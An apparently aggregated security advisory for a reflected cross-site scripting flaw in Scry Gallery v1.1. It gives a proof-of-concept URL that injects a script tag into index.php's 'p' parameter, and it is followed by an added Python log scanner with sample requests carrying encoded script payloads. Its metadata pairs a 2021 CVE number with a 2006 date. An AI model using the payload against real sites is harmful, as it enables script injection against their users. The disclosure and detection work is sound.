Scry Gallery XSS Vulnerability

CVE: CVE-2021-39505
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2006-05-02
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006040104

Below is a copy:

Software : Scry Gallery v1.1
WebSite : http://scry.org/

ISSUE :
The software is prone to an XSS attack using the following proof of concept:

http://anysiteusingscrygallery.com/[Path to scry gallery]/index.php?v=list&i=0&p=<script>var%20variable=111111111111111111;alert(variable);</script>

One can execute malicious scripts using the above code in the web browser.
The above concept also aids a path disclosure to the remote attacker. This vulnerability has been tested and exists on Scry Gallery v1.1.

Additional Credits : mayank , ranjan & jha.
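
A log check for the request pattern described in the advisory, added here as an example (it is not part of the original advisory or of Scry's code): it flags requests to index.php whose query parameters contain HTML markup after repeated URL-decoding. The log lines, client addresses and the /gallery/ path are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines; addresses and the /gallery/ path are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/May/2006:10:00:01 +0000] "GET /gallery/index.php?v=list&i=0&p=holiday HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/May/2006:10:00:07 +0000] "GET /gallery/index.php?v=list&i=0&p=%3Cscript%3Evar%20variable=1;alert(variable);%3C/script%3E HTTP/1.1" 200 4811',
    '203.0.113.9 - - [02/May/2006:10:00:09 +0000] "GET /gallery/index.php?v=list&i=0&p=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 4790',
    '198.51.100.2 - - [02/May/2006:10:01:00 +0000] "GET /gallery/style.css?x=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An opening/closing tag or comment start once the value is decoded.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(line, script="index.php"):
    """Return (name, decoded_value) for parameters of `script` that carry markup."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if target.path.rsplit("/", 1)[-1] != script:
        return []
    pairs = parse_qsl(target.query, keep_blank_values=True)  # decodes once
    return [(n, fully_decode(v)) for n, v in pairs if MARKUP_RE.search(fully_decode(v))]

def scan(lines):
    """Return (client, parameter, decoded_value) for every flagged request."""
    return [(line.split()[0], name, value)
            for line in lines for name, value in suspicious_params(line)]

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} param={name!r} value={value!r}")
```

The scan is scoped to the affected script, so the markup sent to style.css in the last sample line is not reported.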
